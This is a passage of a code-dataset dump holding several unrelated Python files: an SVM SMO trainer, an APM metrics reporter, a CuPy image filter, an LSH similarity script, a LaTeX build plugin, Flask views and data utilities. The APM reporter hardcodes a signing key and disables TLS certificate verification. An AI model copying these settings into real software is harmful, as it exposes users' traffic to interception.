np.zeros((m,1))\n\n    iter = 0\n    iter_done = 0\n    while (iter < maxIter):\n        iter += 1\n        alphaPairsChange = 0\n        for i in range(m):\n            yi = labelArr[i,0]\n            fxi = fx(dataArr, labelArr, i, alphas, b)\n            Ei = fxi - yi\n\n            # KKT violation checks for sample i\n            bool1 = (alphas[i,0] < 0) or (alphas[i,0] > C)\n            bool2 = 1 - yi*fxi > toler\n            bool3 = abs(alphas[i]*(1 - yi*fxi - toler)) > 1e-8\n            if bool1 or bool2 or bool3:\n                j = selectJ(i, m)\n                yj = labelArr[j,0]\n                fxj = fx(dataArr, labelArr, j, alphas, b)\n                Ej = fxj - yj\n\n                alphaI_old = alphas[i,0]\n                alphaJ_old = alphas[j,0]\n\n                if abs(yi - yj)< 1e-8:\n                    L = max(0.0, alphaI_old + alphaJ_old -C)\n                    H = min(C, alphaI_old + alphaJ_old)\n                else:\n                    L = max(0.0, alphaJ_old - alphaI_old)\n                    H = min(C, C + alphaJ_old - alphaI_old)\n\n                xi = dataArr[i]\n                xj = dataArr[j]\n\n                eta = np.dot(xi, xi.T) + np.dot(xj, xj.T) - 2*np.dot(xi, xj.T)\n                if abs(eta)<1e-8: continue  # eta == 0\n\n                alphaJ_new_temp = alphaJ_old + yj*(Ei - Ej)/eta\n                alphaJ_new = clipAlpha(alphaJ_new_temp, H, L)\n\n                alphaI_new = alphaI_old + yi*yj*(alphaJ_old - alphaJ_new)\n\n                alphas[i] = alphaI_new\n                alphas[j] = alphaJ_new\n\n                # if the alpha pair barely changed, don't count the update in alphaPairsChange\n                if (abs(alphaI_new - alphaI_old) < 1e-10) and \\\n                    (abs(alphaJ_new - alphaJ_old) < 1e-10):\n                    continue\n\n                b1 = b - Ei - yi*np.dot(xi, xi.T)*(alphaI_new - alphaI_old) - \\\n                    yj*np.dot(xi, xj.T)*(alphaJ_new - alphaJ_old)\n                b2 = b - Ej - yi*np.dot(xi, xj.T)*(alphaI_new - alphaI_old) - \\\n                    yj*np.dot(xj, xj.T)*(alphaJ_new - alphaJ_old)\n                if (alphaI_new>0) and (alphaI_new<C):\n                    b = b1\n                elif (alphaJ_new>0) and (alphaJ_new<C):\n                    b = b2\n                else:\n                    b = (b1 + b2)/2\n\n                alphaPairsChange += 1\n\n        # count consecutive passes with no alpha update; 20 quiet passes means converged\n        if alphaPairsChange == 0:\n            iter_done += 1\n        else:\n            iter_done = 0\n        if iter_done >= 20 :\n            print('last_iter:', iter)\n            break\n\n
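    # Training loop finished (converged via iter_done or hit maxIter); the\n    # hyperplane parameters w and b are recovered from the optimized alphas below.\n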
if iter >= maxIter: print('last_iter', iter)\n w = get_w(alphas, dataArr, labelArr)\n b = get_b(alphas, dataArr, labelArr)\n\n return alphas, w, b\n\n\n\nif __name__ == '__main__':\n time_start = time.time()\n dataArr,labelArr = loadDataset('SVM_InputData.txt')\n alphas, w, b = smoSimple(dataArr, labelArr, 0.6, 1e-3, 800)\n print('w: ', w)\n print('b: ', b)\n time_end = time.time()\n print('time: ', time_end - time_start, 's')\n #showDataSet(dataArr, labelArr)\n #showClassifer(dataArr, w, b)\n showClassifer(dataArr, labelArr, w, b)\n","sub_path":"SVM/SVM_by_SMO_v1.py","file_name":"SVM_by_SMO_v1.py","file_ext":"py","file_size_in_byte":9371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"582294889","text":"# -*- coding: utf-8 -*-\nimport Queue\nimport hashlib\nimport json\nimport logging\nimport os\nimport socket\nimport sys\nimport threading\nimport time\n\nimport requests\n\n# float number in 2.6 has a bug.\nif sys.version_info[:2] == (2, 6):\n json.encoder.FLOAT_REPR = str\n\nLOGGER = logging.getLogger(__name__)\n\nTHREAD_EXIT = 0\nTHREAD_TASK = 1\nTHREAD_TIMEOUT = 2\nTIMEOUT = 1.0 # 1 second\nMAX_METRICS_PER_REQUEST = 1000 # 1000 metric\n\nCODE_MAP = {\n 200: 'Done',\n 300: 'Wrong Key',\n 301: 'Wrong ProtocolVersion',\n 302: 'Wrong AppVersion',\n 303: 'Wrong Business',\n 304: 'Wrong TimeStamp',\n 305: 'Wrong Signature',\n 306: 'Wrong Task',\n 307: 'Wrong ContentType',\n 501: 'DataBase Error',\n 601: 'Data Length Error',\n 602: 'Decryption Error',\n 603: 'Decompression Error',\n 604: 'Unrecognizable Body',\n 999: 'Unknown Error'\n}\n\n\ndef SendComponents(context, components, metrics):\n if not metrics:\n LOGGER.warning('No metrics to send this interval')\n return\n\n LOGGER.info('Sending %i metrics to RichAPM', metrics)\n context.components = components\n\n try:\n response = requests.post(context.endpoint,\n headers=context.header, data=context.body,\n proxies=context.ptoxies, timeout=context.timeout,\n verify=context.verify)\n except requests.Timeout as error:\n LOGGER.error('Timeout reporting stats, check endpoint(%s)',\n context.endpoint)\n return False\n except requests.RequestException as error:\n LOGGER.error('Error reporting stats, check endpoint(%s):%s',\n context.endpoint,\n unicode(error))\n return False\n\n try:\n res_json = response.json()\n result = int(res_json['result'])\n except (ValueError, KeyError) as error:\n LOGGER.error('Error response body, check endpoint(%s):%r',\n context.endpoint,\n response.content.strip())\n return False\n\n if result in CODE_MAP:\n res_msg = CODE_MAP[result]\n else:\n res_msg = response.content.strip()\n\n LOGGER.info('Report to RichAPM,Response(%s): %r(%d)',\n response.status_code, res_msg, result)\n\n\nclass Context(object):\n HASHKEY = 'uywP%(cnsjdf1'\n PROXIES = None\n TIMEOUT = 10\n VERIFY_SSL_CERT = False\n ENDPOINT = 'https://interface.richapm.com/datareceiving/pluginsupdata'\n ENCODE = 'UTF-8'\n\n HEADER = {\n 'appkey': None,\n 'protocolversion': 'V1.0.0',\n 'appversion': 'V1.0.0',\n 'reqsn': '111111',\n 'business': 'plugins',\n 'timestamp': None,\n 'gzip-encoding': '',\n 'Content-Type': 'application/json;charset=utf-8',\n 'md5key': ''\n }\n\n BODY = {\n 'host': socket.gethostname(),\n 'pid': os.getpid(),\n 'duration': None,\n 'components': None\n }\n\n def __init__(self, key, endpoint=None, wake_interval=60):\n self.key = key.encode(self.ENCODE) if key else None\n self.wake_interval = wake_interval\n self.endpoint = endpoint or self.ENDPOINT\n self.components = None\n\n def 
_md5(self, *fields):\n        md5 = hashlib.md5()\n        for field in fields:\n            md5.update(str(field))\n        return md5.hexdigest()\n\n    @property\n    def header(self):\n        self.HEADER['appkey'] = self.key\n        self.HEADER['timestamp'] = int(time.time())\n        self.HEADER['md5key'] = self._md5(\n            self.key,\n            self.HEADER['protocolversion'],\n            self.HEADER['appversion'],\n            self.HEADER['reqsn'],\n            self.HEADER['business'],\n            self.HEADER['timestamp'],\n            self.HEADER['gzip-encoding'],\n            self.HASHKEY\n        )\n        return self.HEADER\n\n    @property\n    def body(self):\n        self.BODY['duration'] = self.wake_interval\n        self.BODY['components'] = self.components\n\n        return json.dumps(self.BODY,\n                          ensure_ascii=False,\n                          encoding=\"utf-8\")\n\n    @property\n    def timeout(self):\n        return self.TIMEOUT\n\n    @property\n    def verify(self):\n        return self.VERIFY_SSL_CERT\n\n    @property\n    def ptoxies(self):\n        return self.PROXIES\n\n\nclass thread_publish(threading.Thread):\n    def __init__(self, key, endpoint, msg_queue):\n        threading.Thread.__init__(self)\n        self.msg_queue = msg_queue\n        self.context = Context(key, endpoint)\n        self.publish_queue = Queue.Queue(0)\n        self.set_timer = None\n\n    def send_timeout_msg(self):\n        self.msg_queue.put((THREAD_TIMEOUT, None))\n\n    def set_timeout_msg(self):\n        # keep at most one pending timer; assign it to set_timer so the\n        # aliveness check above actually sees it\n        if not self.set_timer or not self.set_timer.isAlive():\n            self.set_timer = threading.Timer(TIMEOUT, self.send_timeout_msg)\n            self.set_timer.start()\n\n    def send_data(self):\n        metrics = 0\n        components = list()\n\n        while self.publish_queue.qsize():\n            component = self.publish_queue.get()\n            components.append(component)\n            metrics += len(component['metrics'].keys())\n            if metrics >= MAX_METRICS_PER_REQUEST:\n                SendComponents(self.context, components, metrics)\n                components = list()\n                metrics = 0\n\n        # if remain\n        if metrics:\n            SendComponents(self.context, components, metrics)\n\n    def run(self):\n        LOGGER.info('Publish Thread Start.')\n\n        while True:\n            cmd, data = self.msg_queue.get()\n\n            if cmd == THREAD_TIMEOUT:\n                LOGGER.debug('Get THREAD_TIMEOUT message.')\n                self.send_data()\n\n            elif cmd == THREAD_TASK:\n                LOGGER.debug('Get THREAD_TASK message.')\n                self.publish_queue.put(data)\n                self.set_timeout_msg()\n\n            elif cmd == THREAD_EXIT:\n                LOGGER.debug('Get THREAD_EXIT message.')\n                self.send_data()\n                break\n\n            else:\n                LOGGER.warning('Unknown command: %s', cmd)\n\n        LOGGER.info('Publish Thread Exit.')\n","sub_path":"pluginsAgent/RichAPM/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"312645581","text":"import cupy as cp\nimport numpy as np\n\nfrom cupyimg.scipy.ndimage.filters import gaussian_filter\nfrom .. import img_as_float\n\n\ndef _unsharp_mask_single_channel(image, radius, amount, vrange):\n    \"\"\"Single channel implementation of the unsharp masking filter.\"\"\"\n\n    blurred = gaussian_filter(image, sigma=radius, mode=\"reflect\")\n\n    result = image + (image - blurred) * amount\n    if vrange is not None:\n        return cp.clip(result, vrange[0], vrange[1], out=result)\n    return result\n\n\ndef unsharp_mask(\n    image, radius=1.0, amount=1.0, multichannel=False, preserve_range=False\n):\n    \"\"\"Unsharp masking filter.\n\n    The sharp details are identified as the difference between the original\n    image and its blurred version.
These details are then scaled, and added\n back to the original image.\n\n Parameters\n ----------\n image : [P, ..., ]M[, N][, C] ndarray\n Input image.\n radius : scalar or sequence of scalars, optional\n If a scalar is given, then its value is used for all dimensions.\n If sequence is given, then there must be exactly one radius\n for each dimension except the last dimension for multichannel images.\n Note that 0 radius means no blurring, and negative values are\n not allowed.\n amount : scalar, optional\n The details will be amplified with this factor. The factor could be 0\n or negative. Typically, it is a small positive number, e.g. 1.0.\n multichannel : bool, optional\n If True, the last ``image`` dimension is considered as a color channel,\n otherwise as spatial. Color channels are processed individually.\n preserve_range : bool, optional\n Whether to keep the original range of values. Otherwise, the input\n image is converted according to the conventions of ``img_as_float``.\n Also see https://scikit-image.org/docs/dev/user_guide/data_types.html\n\n Returns\n -------\n output : [P, ..., ]M[, N][, C] ndarray of float\n Image with unsharp mask applied.\n\n Notes\n -----\n Unsharp masking is an image sharpening technique. It is a linear image\n operation, and numerically stable, unlike deconvolution which is an\n ill-posed problem. Because of this stability, it is often\n preferred over deconvolution.\n\n The main idea is as follows: sharp details are identified as the\n difference between the original image and its blurred version.\n These details are added back to the original image after a scaling step:\n\n enhanced image = original + amount * (original - blurred)\n\n When applying this filter to several color layers independently,\n color bleeding may occur. More visually pleasing result can be\n achieved by processing only the brightness/lightness/intensity\n channel in a suitable color space such as HSV, HSL, YUV, or YCbCr.\n\n Unsharp masking is described in most introductory digital image\n processing books. This implementation is based on [1]_.\n\n Examples\n --------\n >>> import cupy as cp\n >>> array = cp.ones(shape=(5,5), dtype=np.uint8)*100\n >>> array[2,2] = 120\n >>> array\n array([[100, 100, 100, 100, 100],\n [100, 100, 100, 100, 100],\n [100, 100, 120, 100, 100],\n [100, 100, 100, 100, 100],\n [100, 100, 100, 100, 100]], dtype=uint8)\n >>> cp.around(unsharp_mask(array, radius=0.5, amount=2),2)\n array([[0.39, 0.39, 0.39, 0.39, 0.39],\n [0.39, 0.39, 0.38, 0.39, 0.39],\n [0.39, 0.38, 0.53, 0.38, 0.39],\n [0.39, 0.39, 0.38, 0.39, 0.39],\n [0.39, 0.39, 0.39, 0.39, 0.39]])\n\n >>> array = cp.ones(shape=(5,5), dtype=np.int8)*100\n >>> array[2,2] = 127\n >>> cp.around(unsharp_mask(array, radius=0.5, amount=2),2)\n array([[0.79, 0.79, 0.79, 0.79, 0.79],\n [0.79, 0.78, 0.75, 0.78, 0.79],\n [0.79, 0.75, 1. , 0.75, 0.79],\n [0.79, 0.78, 0.75, 0.78, 0.79],\n [0.79, 0.79, 0.79, 0.79, 0.79]])\n\n >>> cp.around(unsharp_mask(array, radius=0.5, amount=2, preserve_range=True), 2)\n array([[100. , 100. , 99.99, 100. , 100. ],\n [100. , 99.39, 95.48, 99.39, 100. ],\n [ 99.99, 95.48, 147.59, 95.48, 99.99],\n [100. , 99.39, 95.48, 99.39, 100. ],\n [100. , 100. , 99.99, 100. , 100. ]])\n\n\n References\n ----------\n .. [1] Maria Petrou, Costas Petrou\n \"Image Processing: The Fundamentals\", (2010), ed ii., page 357,\n ISBN 13: 9781119994398 :DOI:`10.1002/9781119994398`\n .. [2] Wikipedia. 
Unsharp masking\n https://en.wikipedia.org/wiki/Unsharp_masking\n\n \"\"\"\n vrange = None # Range for valid values; used for clipping.\n if preserve_range:\n fimg = image.astype(np.float64)\n else:\n fimg = img_as_float(image)\n negative = cp.any(fimg < 0)\n if negative:\n vrange = [-1.0, 1.0]\n else:\n vrange = [0.0, 1.0]\n\n if multichannel:\n result = cp.empty_like(fimg, dtype=np.float64)\n for channel in range(image.shape[-1]):\n result[..., channel] = _unsharp_mask_single_channel(\n fimg[..., channel], radius, amount, vrange\n )\n return result\n else:\n return _unsharp_mask_single_channel(fimg, radius, amount, vrange)\n","sub_path":"cupyimg/skimage/filters/_unsharp_mask.py","file_name":"_unsharp_mask.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"132022618","text":"import pandas as pd\nimport logging\nfrom datasketch import MinHash, MinHashLSH\nimport time\nimport csv\nimport glob\nimport ntpath\nfrom multiprocessing import Process\n\n# read all data files at once\ndatafiles = glob.glob(\"data/*\")\n\n# This is the similarity threshold\nthreshold = 0.5\n\n# print every x rows\nrowprinter = 5000\n\n# jaccard similarity calculator\ndef get_jaccard_similarity(listA, listB):\n return float(len(set(listA).intersection(set(listB)))) / float(len(set(listA).union(set(listB))))\n\n# sigMat generator\ndef sig_matrix(data, fname):\n sigMat = []\n for rownum in range(len(data)):\n # The user_id is not the same as the rownum\n user_id = data.iloc[rownum][\"device_id\"]\n\n # Get the positions for user_id\n positions = set(data.iloc[rownum][\"timespace\"].split(\",\"))\n\n # Generate the MinHash column for the user's positions\n m = MinHash(num_perm=100)\n\n for time_space_box in positions:\n m.update(time_space_box.encode('utf8'))\n\n # Add the signature column of the user into the main signature matrix\n sigMat.append(m)\n\n # Display the progress of building the signature matrix\n if rownum % rowprinter == 0:\n print(\"%-22s sigmat gen at row: %s\" % (fname, rownum))\n return sigMat\n\n# lsh runner\ndef run_lsh(sigMat, data, fname):\n lsh = MinHashLSH(threshold=threshold, num_perm=100)\n\n for rownum in range(len(sigMat)):\n # For each user generate the lsh signature\n user_id = data.iloc[rownum][\"device_id\"]\n lsh.insert(user_id, sigMat[rownum])\n\n # Display the progress of building LSH\n if rownum % rowprinter == 0:\n print(\"%-22s LSH calc at row: %s\" % (fname, rownum))\n\n return lsh\n\n# file runner\ndef finder(datafile):\n print(\"%s: starting to process\" % datafile)\n totstart = time.time()\n fname = ntpath.basename(datafile)\n\n # create logger to write output\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n handler = logging.FileHandler('results/%s' % fname)\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter('%(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n # load data\n start = time.time()\n data = pd.read_csv(datafile, quotechar='\"', delimiter=\";\")\n print(\"%-22s loaded -- %s sec\" % (fname, str(time.time() - start)))\n\n # generate signature matrix\n start = time.time()\n print(\"%-22s start sigmat\" % fname)\n sigMat = sig_matrix(data, fname)\n print(\"%-22s sigmat done -- %s sec\" % (fname, str(time.time() - start)))\n\n start = time.time()\n print(\"%-22s start LSH\" % fname)\n lsh = run_lsh(sigMat, data, fname)\n print(\"%-22s LSH done -- %s sec\" % (fname, str(time.time() - start)))\n\n # Check the 
first # users\n    number_of_users_to_check = len(sigMat)\n\n    start = time.time()\n    print(\"%-22s writing results\" % fname)\n\n    for rownum in range(number_of_users_to_check):\n\n        # Get the details of the user (user_id, positions)\n        user_id = data.iloc[rownum][\"device_id\"]\n        positions_query = data.iloc[rownum][\"timespace\"].split(\",\")\n        result = sorted(lsh.query(sigMat[rownum]))\n\n        # Bruteforce to validate the generated candidates for the user\n        for us_id in result:\n            # point_locations contains a list of locations for us_id\n            point_locations = data.loc[data[\"device_id\"] == us_id][\"timespace\"].iloc[0].split(\",\")\n\n            sim = get_jaccard_similarity(positions_query, point_locations)\n            if threshold < sim and user_id != us_id:\n                logger.info(\"%s,%s,%s\" % (user_id, us_id, sim))\n\n        # Display the progress of checking the candidate pairs\n        if rownum % rowprinter == 0:\n            print(\"%-22s LSH display at row: %s\" % (fname, rownum))\n\n    print(\"%-22s results done -- %s sec\" % (fname, str(time.time() - start)))\n    print(\"%-22s total time -- %s sec\" % (fname, str(time.time() - totstart)))\n\n# use multiple processes\nstarter = time.time()\nprocesslist = []\nfor d in datafiles:\n    p = Process(target=finder, args=(d,))\n    processlist.append(p)\n\nfor p in processlist:\n    p.start()\n\nfor p in processlist:\n    p.join()\n\nprint(\"Total time: %s\" % str(time.time() - starter))\n","sub_path":"main_lsh.py","file_name":"main_lsh.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"276905103","text":"'''\nLatex build system.\n\nChange ``documentViewerCommand`` to your desired pdf viewer.\n'''\nimport pytext\nfrom pytext import APP\nimport pygments.lexer\nimport subprocess\nimport os\n\ndocumentViewerCommand = 'evince'\n\ndef _InitPyTextPlugin():\n    APP.AddBuildSystem('Latex', CompileLatex)\n\ndef CompileLatex():\n    language = APP.Tabbed.SelectedTab.Language\n    if not pytext.utils.LanguageEqual(language, 'latex'):\n        return\n\n    name, ext = os.path.splitext(APP.Tabbed.SelectedTab.Path)\n\n    latexmk = subprocess.Popen(['latexmk', '-pdf', name],\n        stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n    latexmk.communicate()\n\n    rubberInfo = subprocess.Popen(['rubber-info', name],\n        stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n    stdout, stderr = rubberInfo.communicate()\n\n    if len(stdout) > 0 or len(stderr) > 0:\n        APP.AddTabFromBuildOutput(stdout + stderr)\n    else:\n        if documentViewerCommand != None:\n            pdf = os.path.basename(name) + '.pdf'\n\n            try:\n                subprocess.Popen([documentViewerCommand, pdf])\n            except:\n                pass\n\n    return True","sub_path":"plugins/buildlatex.py","file_name":"buildlatex.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"567214870","text":"from __future__ import print_function\r\nimport sys\r\n\r\nfrom flask import Flask, render_template, request\r\napp = Flask(__name__)\r\n\r\n\r\ntypes = [\r\n{'code': \"airport\", 'val': \"Airports\"},\r\n{'code': \"amusement_park\", 'val': \"Amusement Parks\"},\r\n{'code': \"aquarium\", 'val': \"Aquariums\"},\r\n{'code': \"art_gallery\", 'val': \"Art Galleries\"},\r\n{'code': \"bakery\", 'val': \"Bakeries\"},\r\n{'code': \"bar\", 'val': \"Bars\"},\r\n{'code': \"beauty_salon\", 'val': \"Beauty Salons\"},\r\n{'code': \"book_store\", 'val': \"Book Stores\"},\r\n{'code': \"bowling_alley\", 'val': \"Bowling Alleys\"},\r\n{'code': \"bus_station\", 'val': \"Bus Stations\"},\r\n{'code': \"cafe\",
'val': \"Cafes\"},\r\n{'code': \"casino\", 'val': \"Casinos\"},\r\n{'code': \"clothing_store\", 'val': \"Clothing Stores\"},\r\n{'code': \"florist\", 'val': \"Florists\"},\r\n{'code': \"gym\", 'val': \"Gyms\"},\r\n{'code': \"hindu_temple\", 'val': \"Hindu Temples\"},\r\n{'code': \"hospital\", 'val': \"Hospitals\"},\r\n{'code': \"jewelry_store\", 'val': \"Jewelry Stores\"},\r\n{'code': \"laundry\", 'val': \"Laundries\"},\r\n{'code': \"library\", 'val': \"Libraries\"},\r\n{'code': \"liquor_store\", 'val': \"Liquor Stores\"},\r\n{'code': \"mosque\", 'val': \"Mosques\"},\r\n{'code': \"movie_theater\", 'val': \"Movie Theaters\"},\r\n{'code': \"museum\", 'val': \"Museums\"},\r\n{'code': \"night_club\", 'val': \"Night Clubs\"},\r\n{'code': \"park\", 'val': \"Parks\"},\r\n{'code': \"restaurant\", 'val': \"Restaurants\"},\r\n{'code': \"school\", 'val': \"Schools\"},\r\n{'code': \"shoe_store\", 'val': \"Shoe Stores\"},\r\n{'code': \"shopping_mall\", 'val': \"Shopping Malls\"},\r\n{'code': \"spa\", 'val': \"Spas\"},\r\n{'code': \"stadium\", 'val': \"Stadiums\"},\r\n{'code': \"store\", 'val': \"Stores\"},\r\n{'code': \"subway_station\", 'val': \"Subway Stations\"},\r\n{'code': \"train_station\", 'val': \"Train Stations\"},\r\n{'code': \"university\", 'val': \"Universities\"},\r\n{'code': \"zoo\", 'val': \"Zoos\"}\r\n];\r\n\r\n\r\n\r\n@app.route(\"/\")\r\ndef init():\r\n return render_template(\"main.html\", types=types)\r\n\r\n@app.route(\"/result\", methods=['POST'])\r\ndef result():\r\n\r\n\tif request.method == 'POST':\r\n\r\n\t\ttotal = int(request.form.get('total'));\r\n\t\titems = [];\r\n\r\n\t\tfor i in range(int(total)):\r\n\t\t\titems.append(request.form.get('item_' + str(i)))\r\n\r\n\t\ttotal_types = int(request.form.get('total_types'));\r\n\r\n\t\ttypes = [];\r\n\t\tfor i in range(int(total_types)):\r\n\t\t\ttypes.append(request.form.get('type_' + str(i)));\r\n\r\n\t\treturn render_template(\"result.html\", total = total, items = items, types = types, total_types = total_types)\r\n\r\n@app.route('/', methods=['POST'])\r\ndef submit():\r\n\r\n\r\n return render_template(\"result.html\")\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"588379301","text":"#!/usr/bin/python3\n\"\"\" New view for Amenities objects that handles all default\nRESTful API actions\"\"\"\n\nfrom api.v1.views import app_views\nfrom models import storage\nfrom models.amenity import Amenity\nfrom flask import jsonify, request, make_response, abort\n\n\n@app_views.route('/amenities', methods=['GET'], strict_slashes=False)\ndef amenities():\n \"\"\" Return all the elements of Amenity\"\"\"\n all_elements = storage.all(Amenity)\n states_list = []\n for states in all_elements.values():\n states_list.append(states.to_dict())\n return jsonify(states_list)\n\n\n@app_views.route('/amenities/<amenity_id>',\n methods=['GET'], strict_slashes=False)\ndef amenities_id(amenity_id):\n \"\"\" Return one element of Amenity matched with id\"\"\"\n object = storage.get(Amenity, amenity_id)\n if object is None:\n abort(404)\n return jsonify(object.to_dict())\n\n\n@app_views.route('/amenities/<amenity_id>',\n methods=['DELETE'], strict_slashes=False)\ndef amenities_id_delete(amenity_id):\n \"\"\" Delete one element of Amenity matched with id\"\"\"\n object = storage.get(Amenity, amenity_id)\n if object is None:\n abort(404)\n else:\n storage.delete(object)\n storage.save()\n return {}, 200\n\n\n@app_views.route('/amenities', 
methods=['POST'], strict_slashes=False)\ndef create_amenities():\n \"\"\" Create a new Amenity\"\"\"\n if not request.get_json():\n abort(400, 'Not a JSON')\n else:\n variable = request.get_json(request.data)\n if 'name' in variable.keys():\n instance = Amenity(name=variable['name'])\n storage.new(instance)\n storage.save()\n else:\n abort(400, 'Missing name')\n return make_response(jsonify(instance.to_dict()), 201)\n\n\n@app_views.route('/amenities/<amenity_id>',\n methods=['PUT'], strict_slashes=False)\ndef update_amenities(amenity_id):\n \"\"\" Update one element of Amenity matched with id\"\"\"\n object = storage.get(Amenity, amenity_id)\n if object is None:\n abort(404)\n else:\n if not request.get_json():\n abort(400, 'Not a JSON')\n else:\n variable = request.get_json(request.data)\n if 'name' in variable.keys():\n object.name = variable['name']\n storage.save()\n else:\n abort(400, 'Missing name')\n return jsonify(object.to_dict()), 200\n","sub_path":"api/v1/views/amenities.py","file_name":"amenities.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"369682843","text":"# -*- coding: utf-8 -*-\n\n\nfrom scipy import stats\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom netCDF4 import date2num\nfrom scipy import io\nimport os\nfrom datetime import datetime\n\n\n\ndef cci_extract(_string):\n cont = _string.upper().split('_')\n if len(cont) == 3:\n return {'prefix': cont[0], 'version': cont[1], 'type': cont[2], 'adjust': None}\n elif len(cont) == 4 and cont[3] == 'ADJUSTED':\n return {'prefix': cont[0], 'version': cont[1], 'type': cont[2], 'adjust': cont[3]}\n else:\n raise Exception('Unknown Product')\n\ndef cci_string_combine(info):\n if info['adjust']:\n return \"_\".join([info.get(key) for key in ['prefix', 'version', 'type','adjust']])\n else:\n return \"_\".join([info.get(key) for key in ['prefix', 'version', 'type']])\n\ndef split(el, n):\n '''\n Split list of cells in n approx. 
equal parts for multiprocessing\n :param el: list of elements to split\n :param n: number of lists to split input up into\n :return: list\n '''\n k, m = divmod(len(el), n)\n return (el[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in xrange(n))\n\n\ndef create_workfolder(path):\n # type: (str) -> str\n i = 1\n while os.path.exists(os.path.join(path, 'v' + str(i))):\n i += 1\n else:\n os.makedirs(os.path.join(path, 'v' + str(i)))\n\n workfolder = os.path.join(path, 'v' + str(i))\n print('Create workfolder: %s' % str(workfolder))\n\n return workfolder\n\n\ndef regress(data, testdata_col_name, refdata_col_name):\n '''\n Perform regression of column refdata on column testdata\n '''\n dataframe = data.copy()\n out = dataframe[refdata_col_name]\n dataframe = dataframe.dropna()\n R, pval = stats.pearsonr(dataframe[refdata_col_name], dataframe[testdata_col_name]) # Correlation between Refdata and Testdata\n\n\n if R < 0 or np.isnan(R):\n ress = [np.nan]\n return out, R, pval, ress\n\n testdata = dataframe[testdata_col_name].values\n refdata = dataframe[refdata_col_name].values\n refdata_ones = np.vstack([refdata, np.ones(len(refdata))]).T\n\n ress = np.linalg.lstsq(refdata_ones, testdata)[0][::-1]\n dataframe['ones'] = 1\n xm = np.matrix(dataframe.as_matrix(columns=['ones', refdata_col_name]))\n out = np.dot(xm, np.matrix(ress).transpose())\n\n return pd.Series(index=dataframe.index, data=np.squeeze(np.asarray(out))), R, pval, ress\n\n\ndef datetime2matlabdn(dt):\n ord = dt.toordinal()\n mdn = dt + timedelta(days=366)\n frac = (dt - datetime(dt.year, dt.month, dt.day, 0, 0, 0)).seconds / (24.0 * 60.0 * 60.0)\n return mdn.toordinal() + frac\n\n\ndef dates_to_num(dates):\n calendar = 'standard'\n units = 'days since 1900-01-01 00:00:00'\n timestamps=[]\n for date in dates:\n timestamps.append(pd.Timestamp(date).to_datetime())\n\n return np.sort(date2num(timestamps, units, calendar))\n\n\ndef dt_to_dec(dt):\n # Datetime object to decimal year\n startyear = datetime(dt.year, 1, 1)\n endyear = startyear.replace(year=dt.year + 1)\n return dt.year + ((dt - startyear).total_seconds() / float((endyear - startyear).total_seconds()))\n\n\ndef save_as_mat(path, gpi, test_prod, ref_prod, anomaly, timeframe):\n\n # type: (int) -> None\n\n #Saves the SM data for active timeframe for testproduct and refproduct to the selected path\n # format: *gpi*.mat\n\n\n test_obj = HomogTest(test_prod,\n ref_prod,\n 0.01,\n anomaly)\n\n print('Exporting Testdata and Referencedata to .mat')\n exp_data = test_obj.read_gpi(gpi,\n test_obj.range[0],\n test_obj.range[1]) # type: pd.DataFrame\n exp_data = exp_data / 100\n\n matdate = []\n for dt in exp_data['refdata'].index:\n matdate.append(datetime2matlabdn(dt))\n\n x = {'tspan': matdate,\n 'sm': exp_data['refdata'].values}\n\n y = {'tspan': matdate,\n 'sm': exp_data['testdata'].values}\n\n timeframe = [datetime2matlabdn(timeframe[0]),\n datetime2matlabdn(timeframe[1])]\n\n\n data_dict = {'X': x, 'Y': y, 'timeframe': timeframe}\n io.savemat(os.path.join(path, str(gpi)),\n data_dict, oned_as='column')\n\n\n\ndef timeseries_stats(dataframe, breaktime, timeframe, return_ts=False):\n #TODO: Move this somewhere\n\n df = dataframe.copy(True)\n data_dict = {}\n breaktime_next = breaktime + pd.DateOffset(1)\n # Mean of adjusted testdata after breaktime\n mean_after_break_testdata = np.nanmean(df.loc[breaktime_next:timeframe[1], 'testdata'].values)\n # Mean of adjusted testdata before breaktime\n mean_before_break_testdata = np.nanmean(df.loc[timeframe[0]:breaktime, 
'testdata'].values)\n # Mean of unadjusted testdata after break\n mean_after_break_original = np.nanmean(df.loc[breaktime_next:timeframe[1], 'testdata_original'].values)\n # Mean of testdata before break\n mean_before_break_original = np.nanmean(df.loc[timeframe[0]:breaktime, 'testdata_original'].values)\n # Mean of refdata after break\n mean_after_break_refdata_original = np.nanmean(df.loc[breaktime_next:timeframe[1], 'refdata_original'].values)\n # Mean of refdata before break\n mean_before_break_refdata_original = np.nanmean(df.loc[timeframe[0]:breaktime, 'refdata_original'].values)\n # Mean of refdata after break\n if 'refdata' in dataframe.columns.values:\n mean_after_break_refdata= np.nanmean(df.loc[breaktime_next:timeframe[1], 'refdata'].values)\n # Mean of refdata before break\n mean_before_break_refdata = np.nanmean(df.loc[timeframe[0]:breaktime, 'refdata'].values)\n\n\n # Variance of adjusted testdata\n var_after_break_testdata = np.nanvar(df.loc[breaktime_next:timeframe[1], 'testdata'].values)\n var_before_break_testdata = np.nanvar(df.loc[timeframe[0]:breaktime, 'testdata'].values)\n # Variance of unadjusted testdata\n var_after_break_original = np.nanvar(df.loc[breaktime_next:timeframe[1], 